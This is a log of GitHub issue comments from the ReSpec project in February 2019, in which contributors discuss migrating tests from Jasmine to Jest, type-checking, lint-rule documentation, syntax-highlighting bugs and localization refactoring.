yeah, I think it's a good option... they should have a "migrating from Jasmine" guide... but please see if there are some blog posts with criticisms from other projects.

[2019-02-07 13:50] CodHeK commented on #631
Uh, yeah using jestjs would make us shift entirely from jasmine to jest right, the tests need to be re-written ?

[2019-02-07 13:50] marcoscaceres commented on #631
@saschanaz, from other projects you work on, any experience or suggestions in this area? I can also ask folks on twitter... though it might depress.

We could check what big open source projects are using... like Babel, or some others.

[2019-02-07 13:54] CodHeK commented on #631
@marcoscaceres got this blog, [https://fuhton.com/Migrating-from-Jasmine-to-Jest/](https://fuhton.com/Migrating-from-Jasmine-to-Jest/) I believe we must shift our testing suite to jest, it's got an inbuilt code-coverage tool and syntax looks pretty similar to jasmine.

[2019-02-07 13:55] marcoscaceres commented on #631
Looks like the APIs are very close... so looks like minimal rewrite. That's a huge bonus.

[2019-02-07 13:57] CodHeK commented on #631
Yes, exactly!

[2019-02-07 14:36] marcoscaceres commented on #631
Some reading material
https://medium.com/welldone-software/an-overview-of-javascript-testing-in-2018-f68950900bc3

[2019-02-07 18:26] CodHeK commented on #631
@marcoscaceres so, how should I proceed towards implementing this ? I skimmed through the jest docs, doesn't look any different than jasmine, should I begin with it's integration then ?

[2019-02-07 20:37] marcoscaceres commented on #631
Not yet. An important part of decision if to weight the pros/cons. It’s why I asked if you could find some blogs criticizing it so we can evaluate its merits.

The other things we would do is maybe prototype one module to see if it works and the report we get.

[2019-02-07 20:52] #2081 closed

[2019-02-07 21:13] CodHeK commented on #631
Right! I'll do a bit more research on this first and get back to you!

[2019-02-07 21:33] CodHeK commented on #631
@marcoscaceres we could probably use this [https://github.com/skovhus/jest-codemods](https://github.com/skovhus/jest-codemods) , might make the jasmine to jest migration really easy!

[2019-02-08 01:06] marcoscaceres commented on #2061
Looks interesting, but we generally want to avoid adding any additional dependencies to the project. For things like hooks, etc. we generally write our own.

[2019-02-08 04:37] marcoscaceres commented on #631
@CodHeK, could you try a couple of our tests, see what comes out? Intrigued to see this working.

[2019-02-08 04:53] CodHeK commented on #631
Using the `codemods` right ?

[2019-02-08 04:55] marcoscaceres commented on #631
Yep, using codemods.

[2019-02-08 15:08] CodHeK commented on #631
@marcoscaceres I am a little confused here, I see there is `karma` , `mocha` `jasmine` all three of them present in the `package.json` file, how exactly are we testing here ?

[2019-02-09 05:58] CodHeK commented on #631
I am having problems ( permission errors ) with install jest, is there any sort of restriction in the repo that doesn't let others install new packages ?

[2019-02-09 06:49] Swapnilr1 commented on #1631
@marcoscaceres I would like to work on this issue. Although I understand this is quite challenging, I want to apply for this project in Google Summer of Code 2019, so I want to start learning and contributing more to the codebase.

[2019-02-09 09:22] marcoscaceres commented on #631
No, there should be no restriction. Can you paste in the error?

[2019-02-09 09:32] CodHeK commented on #631
![screenshot 2019-02-09 at 3 00 44 pm](https://user-images.githubusercontent.com/22097366/52519045-89711580-2c7b-11e9-9aca-43994bed4f97.png)

@marcoscaceres I don't know it says `permission denied`, I even tried adding `sudo` didn't work
I tried it on one of my other projects it got installed without any errors! 😕

[2019-02-09 09:38] CodHeK commented on #631
Also, I tried the `codemods` on the `/tests/spec/core/linter-rules` folder worked really well! 😄 now I just need to install `jest` to check if those tests pass.

[2019-02-09 10:06] devanshbatra04 commented on #1631
Hi, I already did some work on this issue before my injury. I have recently been discharged and will send a PR next week when I get back to normal work. Really sorry for the delay for this and other issues I picked up.

[2019-02-09 13:49] marcoscaceres commented on #631
I would try removing the entire node_modules directory and doing `npm install` again. It’s definitely looking like the jest directory has bad permissions for whatever reason.

[2019-02-09 15:09] rahulpurohit29 commented on #1905
Can I do this?

[2019-02-09 15:48] saschanaz commented on #1905
@rahulpurohit29 If you have some TypeScript and JSDoc experience, sure.

[2019-02-10 07:53] CodHeK commented on #631
@marcoscaceres it's starting to work! :D

I used `codemods` on the `/tests/spec/core/linter-rules` folder, ran `npm test` got this...

![screenshot 2019-02-10 at 1 01 46 pm](https://user-images.githubusercontent.com/22097366/52531148-06ad9080-2d37-11e9-8934-33974d517f8a.png)

Iit seems `jest` doesn't work with `RequireJS` need to find a workaround for this!

[2019-02-10 08:04] marcoscaceres commented on #631
Ok, this is good to know. Additional motivation to get rid of RequireJS as a dependency. Appreciate you digging into this.

[2019-02-10 08:05] rahulpurohit29 commented on #1905
If I just add `"checkJs":true` to the src/jsconfig.json it will globally type check for all .js files, right?

[2019-02-10 08:07] saschanaz commented on #1905
All `src/**/*.js` files, yes. You will then have to solve the type errors TS shows.

[2019-02-10 08:08] marcoscaceres commented on #1905
That might be a good place to start - but @saschanaz will know more. Try it and see what errors are emitted.  For where the type checks fail, then I assume you would need to go and fix those errors.

[2019-02-10 08:09] CodHeK commented on #631
`require([`core/linter-rules/${ruleName}`], ({ rule }) => resolve(rule));` is this the part where `RequireJS` is being used ?

[2019-02-10 08:12] saschanaz commented on #1905
I've found too hard to do fix everything at once, so if you get too much errors then just solve some of them and open a PR. Then we can make things better progressively.

[2019-02-10 08:12] marcoscaceres commented on #631
Yeah, it could be... what happens if you treat that as an ES6 import instead? The RequestJS is irrelevant.

[code]

[2019-02-10 08:15] marcoscaceres commented on #1905
Breaking up the problem is a good suggestion... @rahulpurohit29, try to do one file at a time. Any fixes you can make will be a significant contribution to the project. It will also make it easier for us to review the changes you make (and a good opportunity for you to understand the code).

[2019-02-10 08:37] CodHeK commented on #631
`import { rule } from  '../../../src/core/linter-rules/check-charset';` this would be correct with the right path right ?

 I don't know why I get this error saying `Cannot find module '../../../src/core/linter-rules/check-charset' from 'check-charset-spec.js`

[2019-02-10 08:42] CodHeK commented on #631
@marcoscaceres  `import { rule } from  '../../../../src/core/linter-rules/check-charset.js';` this worked "
😛

[2019-02-10 10:29] ThobyV commented on #1769
@marcoscaseres Please can I work on this issue? Would love to.

[2019-02-10 10:31] ThobyV commented on #1741
Would love to work on this issue @marcoscaceres. I'm pretty new, looking for work to get things started.

[2019-02-10 10:48] saschanaz commented on #1769
@marcoscaceres Still good to have or not? I don't use Edge now, have no push anymore.

[2019-02-10 11:38] EvsChen commented on #2062
Hi @saschanaz! I have a question. If the script does not halt on error/warning, it seems to me adding `-e` and `-w` will produce no effect to the output. I'm a little confused.

[2019-02-10 12:06] marcoscaceres commented on #1769
Agree. I don’t think we should bother, tbh.

Sorry @ThobyV, you will need to find a different one.

[2019-02-10 12:06] #1769 closed

[2019-02-10 12:40] saschanaz commented on #2062
@EvsChen Try adding this IDL on a document:

[code]

and run respec2html against it with `-e -w`. It should emit all warnings and then halt, without an output file.

[2019-02-10 22:33] pradeepgangwar commented on #1669
@marcoscaceres Should I edit these in wiki directly?

[2019-02-10 22:38] gkellogg commented on #2064
I'm still seeing the problem in 24.3.0, has the fix been released?  For example, click on tabs in https://w3c.github.io/json-ld-syntax/#example-30-using-vocabularies.

[2019-02-10 22:45] marcoscaceres commented on #1669
I’d suggest we do the first round here, then we can edit them together. Then we can migrate the resulting text to the wiki.

[2019-02-10 22:47] marcoscaceres commented on #2064
Confirmed. Reopening.

[2019-02-10 22:49] pradeepgangwar commented on #1669
Sure. I will add the documentation here in few hours. Thanks. :)

[2019-02-10 22:52] marcoscaceres commented on #2064
Greg, as a temporary work around, would it be possible for you to make the modifications after ReSpec is done? (I.e., using `postProcess`).

[2019-02-10 22:57] marcoscaceres commented on #2064
Note for when we try to fix this: using hyperHTML.bind() on the div should retain the event handler.

[2019-02-11 02:32] saschanaz commented on #2064
@marcoscaceres The issue here is that #2082 has been released yet.

[2019-02-11 03:25] marcoscaceres commented on #2064
oh, my bad. I thought I'd released it!!!

[2019-02-11 03:26] marcoscaceres commented on #2064
Doing release right now.

[2019-02-11 03:31] marcoscaceres commented on #2064
Working, thanks @saschanaz! ☺️

[2019-02-11 03:31] #2064 closed

[2019-02-11 06:10] pradeepgangwar commented on #1669
# `check-punctuation` lint rule

Enable this lint rule to check for punctuation. This makes sure that there are no punctuations missing at the end of `<p>` tag.

For example:
[code]
You will receive a warning that your `<p>` tag should end with punctuation mark.

## Example of usage

[code]

## Example Warning
![screenshot_2019-02-11 replace me with a real title](https://user-images.githubusercont

[2019-02-11 06:12] pradeepgangwar commented on #1669
@marcoscaceres Please check the documentation i posted in above comment. :)

[2019-02-11 06:12] marcoscaceres commented on #1669
This is good, but exclude the "Example Warning".

[2019-02-11 06:13] pradeepgangwar commented on #1669
Done.

[2019-02-11 06:13] marcoscaceres commented on #1669
This might be overly specify. But maybe say:

It checks for:

  * full stops at the end of `<p>` tags.

[2019-02-11 06:13] marcoscaceres commented on #1669
(we might add more things eventually, like checking for full stops, :, etc. in `li` elements.

[2019-02-11 06:18] pradeepgangwar commented on #1669
Done. Should I specifically say `full stops` or punctuation mark is ok?

[2019-02-11 06:19] marcoscaceres commented on #1669
yeah, you are right... it should say "checks that `<p>` tags end with a punctuation mark.".

[2019-02-11 06:39] pradeepgangwar commented on #1669
# `check-punctuation` lint rule

Enable this lint rule to check for punctuation. It checks for:
- Punctuation mark at the end of `<p>` tag. It should end with any of  ".", ":", "!", "?".

For example:
[code]
You will receive a warning that your `<p>` tag should end with punctuation mark.

## Example of usage

[code]

[2019-02-11 11:00] CodHeK commented on #631
@marcoscaceres jest worked! 🎉
![screenshot 2019-02-11 at 4 28 08 pm](https://user-images.githubusercontent.com/22097366/52559113-5fa22500-2e1a-11e9-8774-6485d4ca1d47.png)

[2019-02-11 11:02] marcoscaceres commented on #631
Ok, awesome! How do we now pull coverage information from it?

[2019-02-11 11:02] CodHeK commented on #631
We can just run `npm coverage` for that!

[2019-02-11 11:03] marcoscaceres commented on #631
I've never do it, so what does it produce?

[2019-02-11 11:04] CodHeK commented on #631
I'll just implement it on the `linter-rules` folder and post a screenshot here!

[2019-02-11 11:05] marcoscaceres commented on #631
Appreciate that. Excited to see where this is going!

[2019-02-11 11:10] CodHeK commented on #631
@marcoscaceres The coverage is of this sort...

![screenshot 2019-02-11 at 4 39 35 pm](https://user-images.githubusercontent.com/22097366/52559614-b9571f00-2e1b-11e9-8fb9-edb3424c1c5b.png)

![screenshot 2019-02-11 at 4 39 26 pm](https://user-images.githubusercontent.com/22097366/52559609-b3f9d480-2e1b-11e9-9477-eeb0c183c0ad.png)

[2019-02-11 12:50] marcoscaceres commented on #2071
Closing this as it's a bit outside the scope of what ReSpec can do (and the current links more or less serve this purpose). Appreciate the suggestion nonetheless.

[2019-02-11 12:50] #2071 closed

[2019-02-11 12:58] marcoscaceres opened #2084 "Modules should contain their own localization information"
We currently have localization strings in core/l10n.js that are used throughout ReSpec. However, it's rare that a localized string is used in more than one place at a time. What would be better is for where localization happens, the strings be included in the appropriate module itself.

Then core/l10n should only export the `lang` of the document, which should be configurable. Then each module tha

[2019-02-11 13:15] marcoscaceres commented on #631
Very nice!

We probably don’t need to save to a file, but we might still want this to somehow be part of our continuous intergration process. We would generally want 100% coverage for any new code.

[2019-02-11 13:22] marcoscaceres commented on #631
Ok, something like this might work 🤔

https://github.com/nickmerwin/node-coveralls/blob/master/README.md#jest

[2019-02-11 13:27] CodHeK commented on #631
@marcoscaceres yeah!!

[code]

I'll have to replace the karma units tests with these right or we run both ? 😕

[2019-02-11 13:53] ThobyV commented on #2084
Can I take on this issue please?

[2019-02-11 13:55] marcoscaceres commented on #631
Yeah, there seems to be good instructions here:
https://medium.com/@ollelauribostr/start-measuring-coverage-with-jest-travis-ci-and-coveralls-1867928aca42

I’d try bundling everything up into a pull request. I’ve enabled coveralls for ReSpec over on coveralls.io... so should see something work hopefully 🤞

[2019-02-11 13:57] marcoscaceres commented on #631
Note we use “develop” instead of “master”.

[2019-02-11 13:57] CodHeK commented on #631
@marcoscaceres I'll make all the tests ready and passing with jest until then! Should I also do the travis integration ?

[2019-02-11 13:58] marcoscaceres commented on #2084
Sure @ThobyV. Go for it. Are you clear on what you need to do?

[2019-02-11 13:59] marcoscaceres commented on #631
Not sure yet. Karma will probably break I think, so I think it will be jest only.

[2019-02-11 14:02] CodHeK commented on #631
@marcoscaceres there's a small problem with the other tests, the line `afterAll(flushIframes)` (eg: `algorithms-spec.js`) , I don't see where the function `flushIframes` is being imported here... 😕

[2019-02-11 14:02] marcoscaceres commented on #631
About the work items. I’d suggest sending a pull request now. We won’t merge it, but it’s to make sure we can check it’s on the right track. This might turn out to be a lot of work... so go slow. Do the easy ones first and get feedback.

[2019-02-11 14:05] CodHeK commented on #631
Yes! Sending one now!

[2019-02-11 14:05] marcoscaceres commented on #631
It’s imported via https://github.com/w3c/respec/blob/develop/tests/spec/SpecHelper.js

Which may be part of Jasmine. Jest must have an equivalent.

[2019-02-11 14:07] CodHeK commented on #631
Yes, but how is it imported in the file test files, I don't see any `require` or `imports` ?

[2019-02-11 14:11] CodHeK commented on #631
Oh, okay these are `Globals` ! 😅

[2019-02-11 14:15] marcoscaceres commented on #631
Heh, yep... sort of. So:
https://github.com/w3c/respec/blob/develop/tests/SpecRunner.html

And there is one more...

[2019-02-11 14:17] marcoscaceres commented on #631
karma injects it too:

https://github.com/w3c/respec/blob/develop/karma.conf.js

[2019-02-11 14:18] marcoscaceres commented on #631
Jest must have some kind of global loader too.

[2019-02-11 14:19] CodHeK commented on #631
I shall send a PR now, `linter-rules` folder is set! There's a lot work left on the other test file which I shall complete gradually ...

And yes, jest has something called as `mockers` I guess for such Globals.

[2019-02-11 14:25] CodHeK commented on #631
@marcoscaceres sent a PR - https://github.com/w3c/respec/pull/2085

[2019-02-11 14:42] marcoscaceres commented on #631
What we could do is incrementally transition from Karma/Jasmine to jest being explicit about which runner runs what. That will allow us to do one at a time, and hopefully prevent bit-rot. We could start with the linters and then some of the easy ones.

[2019-02-11 15:40] EvsChen commented on #2062
I'm not quite sure if we could achieve what you mentioned by "without an output file". When we start writing the output, we cannot decide whether all the errors and warnings have been emitted.

But the first part is definitely OK, i.e. "emit all the warnings/errors".

[2019-02-11 15:45] CodHeK commented on #631
Should I add travis too ? like only for the linter-rules folder ?

[2019-02-11 16:01] ThobyV commented on #2084
I would need a bit more explanation if you could, but can you please point me to an example module that uses the *core/i10n*  localization strings but not the newly proposed, required model used in https://github.com/w3c/respec/blob/develop/src/core/linter-rules/check-charset.js#L6-L18

I think I would be able to find out more from there.

[2019-02-11 23:01] marcoscaceres commented on #631
Yes, adding TravisCI support would be great.

[2019-02-12 00:08] saschanaz commented on #2062
respec2html already emits an output file only after the processing is completed (as it waits respecIsReady).

All console errors/warnings before that point should be always shown.

[2019-02-12 02:53] marcoscaceres commented on #2084
You should be able to find lots of instances by searching the code for "conf.l10n".

Try:
[code]

to see where they are used, and in what context.

[2019-02-12 03:44] EvsChen commented on #2062
Hi @saschanaz I've submitted a PR (ignore the closed one). Please review!
The handle of the `flags` is kinda weird. I wonder if there is a better way to do this.

[2019-02-12 11:39] #2062 closed

[2019-02-12 13:43] EvsChen commented on #1858
Any updates on this issue? would like to pick this up

[2019-02-12 13:47] marcoscaceres commented on #1858
feel free to take it. You might be able to integrate with whatever the HTML spec is doing/using.

[2019-02-12 15:08] Swapnilr1 commented on #1631
@devanshbatra04 OK. But please do tell if you leave this issue for some reason.

[2019-02-12 20:23] devikasugathan commented on #2051
I'm an absolute beginner and would like to take this up as my first contribution.
@shreya99oak are you still working on it? if not @marcoscaceres can I work on it?

[2019-02-12 22:19] marcoscaceres commented on #2051
@devikasugathan feel free to take it.

[2019-02-13 03:40] EvsChen commented on #1858
Thanks! I looked at the way html spec does this. They look for element `id` in the MDN json to determine whether to insert the MDN annotation or not. Are we going to follow this or use some new attributes?

For me, a prefix id syntax like `<code id="mdn:sessionStorage"></code>` may be more effective in dom parsing.

[2019-02-13 06:03] marcoscaceres commented on #1858
I'd prefer we do whatever HTML is already doing: that way we can leverage and maybe improve whatever @sideshowbarker already built. Then we don't need to maintain as much code and we get benefit across HTML and all ReSpec specs.

[2019-02-13 06:41] EvsChen commented on #1858
I think their build tool `whatwg/wattsi` is using pascal. It's kind of hard to "integrate" what they are doing. At best we could follow their procedure.

[2019-02-13 06:43] marcoscaceres commented on #1858
Ok, I meant more just on using the same HTML IDs/hooks and the JavaScript that is driving the widget/loading the JSON form MDN... assuming the widget above is just being generated with JavaScript. If the integration is happening at using Pascal, then yeah... we will roll our own.

[2019-02-13 07:06] sideshowbarker commented on #1858
Yeah the main requirement is to make the generation of the MDN annotations fully automatic so that authors don’t have to do anything new. The necessary data is all already available:

* https://w3c.github.io/mdn-spec-links/#user-content-spec-json-files
* https://github.com/w3c/mdn-spec-links

As explained in https://github.com/w3c/mdn-spec-links/blob/master/README.md, the names of the JSON files t

[2019-02-13 07:09] marcoscaceres commented on #1858
@sideshowbarker, the one bit I'm still unclear on is if we need to recreate the MDN widget that's in the GIF above? Or is that something you are adding into the HTML Spec at build time?

[2019-02-13 07:13] sideshowbarker commented on #1858
The MDN widget that's in the GIF above is something gets added into the HTML spec at build time.

[2019-02-13 07:19] marcoscaceres commented on #1858
Ok, cool. Thanks for confirming. @EvsChen, guess we have our answer then :)

@EvsChen, before you dive too deep, maybe describe how you plan to implement this and we can start with a small pull request. This has the potential to be quite a big task, so it might be good to build it up incrementally with a prototype we can refine.

[2019-02-13 11:46] EvsChen commented on #1858
I made draft plan on this. Each step could fit in a PR.

On a new branch,
1. Add a new plugin called `mdn-annotation` in core. This plugin should fetch and serialize the corresponding json by looking up spec short name in `SPECMAP.json`.
2. Add more functions to the plugin: for all the element (except `sections`?) that has ID in fetched json, add a simple expandable widget with link.
3. Add browse

[2019-02-13 13:18] gsnedders opened #2089 "Update my name"
There's a few files in `tests/` that refer to me as Geoffrey; these should be updated to Sam.

Given they're in tests, I don't know if there's any expectations anywhere I need to update, and I don't have the time to figure out how to run them.

The cases are:

[code]

[2019-02-13 13:26] marcoscaceres commented on #2089
No problem. Will get then fixed for ya. I don’t think anything touches those files and pretty sure nothing checks the names.

[2019-02-13 13:57] coderquill commented on #2021
Is anyone working on this? if not can I take this as my first contribution @marcoscaceres ?

[2019-02-13 14:17] marcoscaceres commented on #1858
Plan sounds good. Looking forward to seeing what you come up with! Any issues or questions, please reach out. We are always happy to help.

[2019-02-13 14:33] marcoscaceres commented on #2021
@coderquill sure, go for it. Please see the developer guide linked from the README to get started.

[2019-02-13 21:15] ThobyV commented on #2084
Thanks @marcoscaceres for your time. I am about to Implement your instructions and hopefully send a PR for review. However There are some things I wish to be clear about.

Firstly, Is it ok to remove  the `run` function from *core/I10n* and where it's called since I think we wouldn't need or export it anymore as we are no longer setting the `config.I10n` object to localization strings  (If I am co

[2019-02-13 21:25] ThobyV commented on #2084
Thanks @marcoscaceres for your time. I am about to Implement your instructions and hopefully send a PR for review. However There are some things I wish to be clear about.

Firstly, Is it ok to remove  the `run` function from *core/I10n* and where it's called since I think we wouldn't need or export it anymore as we are no longer setting the `config.I10n` object to localization strings  (If I am co

[2019-02-13 22:32] saschanaz commented on #2021
We should make sure that <div data-cite> never gets converted into <cite>.

[2019-02-14 10:00] Swapnilr1 commented on #1672
@saschanaz Can I work on this issue?

[2019-02-15 09:05] saschanaz commented on #1672
I think we are not ready to do this yet. We need to support relative paths via `import.meta.url` so that respec can be run anywhere, but webpack does not support `import.meta` yet. (https://github.com/webpack/webpack/issues/6719)

[2019-02-15 09:49] CodHeK commented on #1970
@devanshbatra04 mind if I start working on this issue ?

[2019-02-15 20:52] ThobyV commented on #2084
@marcoscaceres I do hope I am doing the right things.

[2019-02-15 22:23] marcoscaceres commented on #2084
I would leave it for now, for backwards compatibility. There might be people using in in eternal modules that we don't know about.

Yes, that is correct.

I'd suggest just starting with one module and just sending a PR for that (so we can check you are on the right path). Don't do them all at once.

[2019-02-16 07:22] Irelokeh commented on #2084
Oh Thanks @Marcoscaceres, I also thought it would be good to do gradual changes. I will send a P.R For review.

[2019-02-16 07:33] ThobyV commented on #2084
Oh thanks @marcoscaceres,  I also thought so to work on one module firstly. I will send a PR. I'm grateful for your time.

[2019-02-17 04:24] marcoscaceres commented on #1970
@CodHeK feel free to take it.

[2019-02-17 05:55] CodHeK commented on #1970
@marcoscaceres this is where the highlight is added right ? [https://github.com/w3c/respec/blob/develop/src/core/highlight.js#L62](https://github.com/w3c/respec/blob/develop/src/core/highlight.js#L62)

[2019-02-17 06:42] CodHeK commented on #1970
Also, what I noticed is that when it's selecting all the elements to be linked, [here](https://github.com/w3c/respec/blob/develop/src/core/link-to-dfn.js#L35) it is not able to select `<a>` elements that are inside the `<pre>` tag!

[2019-02-17 08:03] devanshbatra04 commented on #1970
@CodHeK ```core/link-to-dfn.js``` is alright, it does include this links and is not the source of this issue.
You have identified correctly that the highlights are added at https://github.com/w3c/respec/blob/develop/src/core/highlight.js#L62
However on the line preceding this (on #L61) The ```innerHTML``` gets rewritten for the ```<pre>``` element from the message received from https://github.com/

[2019-02-17 08:32] marcoscaceres commented on #1970
And then here:
https://github.com/w3c/respec/blob/develop/worker/respec-worker.js#L22

[2019-02-17 08:36] devanshbatra04 commented on #1970
Wow I had been looking at the wrong worker all this while :"(

[2019-02-17 08:44] CodHeK commented on #1970
Also, the problem here is that it's taking `Foo W3C` as a single text, probably why it's not able to highlight `Foo` to its `dfn` ..

[2019-02-17 09:05] CodHeK commented on #1970
Yeah, this is the problem! Probably, we'd have to have to save `element.childNodes` and insert them later

[2019-02-17 09:11] CodHeK commented on #1970
@devanshbatra04 commenting out `element.innerHTML` fixed the bug!

[2019-02-17 09:50] devanshbatra04 commented on #1970
that's not a fix. that's undoing anything ```core/highlight``` was doing in the first place.

[2019-02-17 10:07] CodHeK commented on #1970
Why do we need to assign innerHTML = value in the first place ?

On Sunday, February 17, 2019, 3:20 PM, Devansh Batra <notifications@github.com> wrote:

that's not a fix. that's undoing anything core/highlight was doing in the first place.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub, or mute the thread.

[2019-02-17 10:18] saschanaz commented on #1970
Maybe we should run the highlighter first and then do linking?

[2019-02-17 10:21] devanshbatra04 commented on #1970
@saschanaz wouldn't work because the highlighter removes anchor tags, just keeps the ```innerText``` of the ```<pre>``` block.
I think we need to rewrite ```respec-worker```

[2019-02-17 10:22] saschanaz commented on #1970
@devanshbatra04 I tried the example in the OP and found the highlighter keep the anchor. https://codepen.io/SaschaNaz/pen/daQBLG

[2019-02-17 10:24] saschanaz commented on #1970
@devanshbatra04 I retried locally and okay, you're right.

[2019-02-17 10:29] saschanaz commented on #1970
So I would suggest two ways to fix (or workaround) this:

1. Just use `class=nohighlight`
2. Or, to make things strict, require a valid language hint (`class="(language name)"`) to run highlighter.

[2019-02-17 10:37] saschanaz commented on #1970
https://github.com/w3c/respec/blob/4e9f304f522fe03c21e36c52f732a2abf2908c5c/src/core/highlight.js#L48-L53

That means here. Yeah, maybe we could instead pass `element.innerHTML` and the highligher may keep the anchor intact... I don't have a strong opinion here.

[2019-02-17 10:41] devanshbatra04 commented on #1970
![screenshot from 2019-02-17 16-10-17](https://user-images.githubusercontent.com/33961252/52911773-8b1b8880-32ce-11e9-8af0-77fa27da2fd4.png)
Here's what happens if I just pass the ```element.innerHTML```, as I said we need to rewrite respec-worker using this approach. I do like ```class=nohighlight``` instead.

[2019-02-17 10:52] marcoscaceres commented on #1669
Made some changes to the above comment - and enabled syntax highlighting on the example blocks. Looks good to add to the wiki.

[2019-02-17 10:52] devanshbatra04 commented on #1970
[code]
This code is working fine already, so I believe the issue stands resolved?

[2019-02-17 10:53] devanshbatra04 commented on #1970
Although I believe we should still use ```element.innerHTML``` to allow support for HTML.

[2019-02-17 11:08] marcoscaceres commented on #2089
pull request sent... will be merged soon.

[2019-02-17 12:00] greenkeeper[bot] opened #2094 "An in-range update of snyk is breaking the build 🚨"
## The dependency [snyk](https://github.com/snyk/snyk) was updated from `1.130.0` to `1.131.0`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Fsnyk-1.131.0).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

snyk is a direct dependency of this project, and **it is very likely causi

[2019-02-17 13:02] #2089 closed

[2019-02-17 18:04] pradeepgangwar commented on #1669
@marcoscaceres Added to wiki. :D

[2019-02-17 23:46] marcoscaceres commented on #1970
I think I'm also leaning towards what @saschanaz said in https://github.com/w3c/respec/issues/1970#issuecomment-464439658 (i.e., the author should use  `class="nohighlight"`) as otherwise this mixes programming languages with spec stuff.

@palemieux can you live with the above? I.e., we can't really fix this because ReSpec depends on an external library to do the syntax highlighting.

[2019-02-17 23:46] marcoscaceres commented on #1970
closing as "won't fix".

[2019-02-17 23:46] #1970 closed

[2019-02-18 00:49] marcoscaceres opened #2096 "core/utils joinAnd function should use ListFormat"
It would be great if core/utils's [`joinAnd()`](https://github.com/w3c/respec/blob/develop/src/core/utils.js#L382) would make use of the new [ListFormat API](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/ListFormat).

What needs to change:

 1. core/utils should import `lang as docLang` from core/i18n.
 1. `joinAnd()` should gain a third argument lang that defaul

[2019-02-18 00:51] marcoscaceres commented on #2096
@devanshbatra04, would you like to work on this one?

[2019-02-18 00:54] #2094 closed

[2019-02-18 00:55] marcoscaceres commented on #2084
@ThobyV, looking forward to seeing what you come up with!

[2019-02-18 01:04] saschanaz commented on #1970
@marcoscaceres

[The HTML spec](https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-code-element) recommends using `<pre>` and `<code>` together. Should we follow it? (Related issues: https://github.com/whatwg/html/issues/3764, https://github.com/whatwg/html/pull/3768)

If then we could fix this by requiring `<code>` inside `<pre>` to run highlighter, although it would be a breaki

[2019-02-18 01:11] marcoscaceres opened #2097 "Promote some W3C modules to "core" modules"
The following configuration options should be handled by "core" modules.

 * doJsonLd
 * canonicalURI

[2019-02-18 01:21] marcoscaceres commented on #1970
I'd prefer not to do that... but we should make our output be HTML-spec conforming (ie., `<pre><code>`, which is currently isn't).

So would prefer authors just keep using `<pre class="lang">` everywhere.

[2019-02-18 01:25] marcoscaceres opened #2098 "Highlighted code should be wrapped in code element"
Code coming back from the syntax highlighter should be wrapped in a `<code>` element, so to semantically conform with HTML spec.

[2019-02-18 01:26] marcoscaceres commented on #1970
files https://github.com/w3c/respec/issues/2098

[2019-02-18 01:27] marcoscaceres commented on #2098
Needs to happen around here:
https://github.com/w3c/respec/blob/develop/src/core/highlight.js#L61

Could be as simple as:
[code]

[2019-02-18 01:29] marcoscaceres commented on #2098
Note, the above is only for `pre` elements... so actually, it would need to wrap.

[2019-02-18 01:40] saschanaz commented on #2098
Maybe we should also allow the standard-styled input: `<pre><code style="(lang)">... code ...</code></pre>`.

[2019-02-18 01:54] saschanaz commented on #2096
Looks like even Firefox Nightly does not support the API.

[2019-02-18 01:54] marcoscaceres commented on #2098
Yeah, I would not mind that at all.

[2019-02-18 01:57] marcoscaceres commented on #2096
https://bugzilla.mozilla.org/show_bug.cgi?id=1433306 is tracking bug for Firefox. There is some code already there so we should hopefully ship it in a year or so.

[2019-02-18 03:21] devanshbatra04 commented on #2096
Yes, on it.

[2019-02-18 03:31] saschanaz commented on #1970
I'm okay with that but the issue here is about `<pre>` without a language tag. Maybe we could:

1. If `<pre>` has a class, keep the current behavior
2. If it has no class and no `<code>` in it, do not run highlighter for the element.

[2019-02-18 03:39] marcoscaceres commented on #1970
We might need to check some specs to see how much breakage there would be. The assumption thus far with the highlighter is that it automatically detect the language for you (even if it's a bit hit or miss).

[2019-02-18 04:26] CodHeK commented on #2098
@marcoscaceres that issue got closed, can I take this one?

[2019-02-18 04:29] marcoscaceres commented on #2098
@CodHeK, sure. But we are still working out the details. We know at a minimum we want to wrap the pre in code, so that might be a place to start.

[2019-02-18 04:30] marcoscaceres commented on #2098
Oops, I mean wrap the highlighted code in in a `code`, not "the pre in code".

[2019-02-18 04:52] marcoscaceres commented on #2084
Related issue that we should fix as part of this: https://github.com/Geonovum/respec/issues/164

[2019-02-18 08:21] greenkeeper[bot] opened #2100 "An in-range update of snyk is breaking the build 🚨"
## The dependency [snyk](https://github.com/snyk/snyk) was updated from `1.132.2` to `1.133.0`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Fsnyk-1.133.0).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

snyk is a direct dependency of this project, and **it is very likely causi

[2019-02-18 13:30] ThobyV commented on #2084
@marcoscaceres Sure I will be sending a P.R in some hours. Thanks! I want to make sure as possible I try to fix every issue assigned to me. I am very lucky and glad I could use your help. I will contact you more frequently through the issues.

Also I have checked the *Geonovum* Branch of Respec issue which you referenced. I will try to run some test and then check for fix,

[2019-02-18 13:34] marcoscaceres commented on #2084
Remember code does not need to be perfect before you send a PR. It’s perfectly fine to send up code just to get initial feedback. If you spend too much time, and you’ve done the wrong thing, you will only find out too late. It’s better to send code up early and get review/guidance as you go (i.e., “perfect is the enemy of the good”).

[2019-02-18 14:11] ThobyV commented on #2084
Truly I will do Exactly as you say. I have been trying to do things to be perfect. Thanks for the advice. I am encouraged by you @marcoscaceres .

[2019-02-18 14:43] #2096 closed

[2019-02-18 16:05] thijsbrentjens opened #2103 "Build command hardcodes w3c-profile"
## Important info

* URL to affected spec: n/a
* ReSpec version: Click the ReSpec pill (e.g., 24.3.x).
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:
Building the profile of Geonovum with the new builder tool does not use the profile of Geonovum. A document that uses this build shows a W3C document.

But what I was expecting?:
Th

[2019-02-18 17:06] CodHeK commented on #2098
@marcoscaceres I don't follow, why should the contents in `<pre` be wrapped using the `<code>` tag ?

[2019-02-18 21:30] marcoscaceres commented on #2098
Please see https://github.com/w3c/respec/issues/1970#issuecomment-464538998

[2019-02-18 23:11] devanshbatra04 commented on #2061
Can I take this issue?

[2019-02-18 23:26] marcoscaceres commented on #2061
Sure, go for it.

[2019-02-19 01:47] marcoscaceres commented on #2103
A pull request would be great!

